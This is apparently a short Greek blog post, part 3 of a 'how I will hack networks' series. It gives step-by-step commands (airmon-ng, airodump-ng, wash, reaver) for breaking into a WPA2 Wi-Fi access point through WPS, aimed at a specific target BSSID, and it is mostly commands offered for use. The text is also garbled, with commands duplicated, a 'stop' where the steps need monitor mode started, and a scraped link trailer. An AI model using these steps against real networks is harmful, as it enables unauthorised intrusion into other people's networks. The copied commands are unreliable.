Δευτέρα, 20 Φεβρουαρίου 2017

ΠΩΣ ΘΑ ΧΑΚΑΡΩ ΔΙΚΤΥΑ 3


1.  Ανοίξτε το τερματικό σας (CTRL + ALT + T) και πληκτρολογείστε airmon-ng


# airmon-ng2. Το επόμενο βήμα θα είναι να διακοπεί η σύνδεση wifi 


# airmon-ng stop wlan0
airmon-ng stop wlan
airmon-ng stop wlan0
3. Τώρα είμαστε έτοιμοι να δούμε την ασύρματη κίνηση γύρω μας. Εκτελώντας airodump-ng wlan0 θα αρχίσει η καταγραφή των δεδομένων # airodump-ng wlan0
4. Από το βήμα 3 παραπάνω, μπορούμε να βρούμε το σημείο πρόσβασης με αλγόριθμο κρυπτογράφησης WPA2, σημειώστε τον αριθμό του καναλιού. Τώρα θα μάθετε αν στόχος έχει ενεργοποιημένο ή όχι WPS.
 # wash -i wlan0 -c 8 -C -s
wash -i wlan0 -c 8 -C -s
wash -i wlan0 -c 8 -C -s
5.  Στο τελευταίο βήμα χρησιμοποιώντας Reaver για τον κωδικό πρόσβασης WPA2


#  reaver -i wlan0 -b E0:05:C5:5A:26:94 –fail-wait=360
reaver -i wlan0 -b E0:05:C5:5A:26:94 –fail-wait=360 - See more at: http://www.hacking-tutorial.com/hacking-tutorial/wifi-hacking-cracking-wpa2-password/#sthash.Hp9xVSk4.dpuf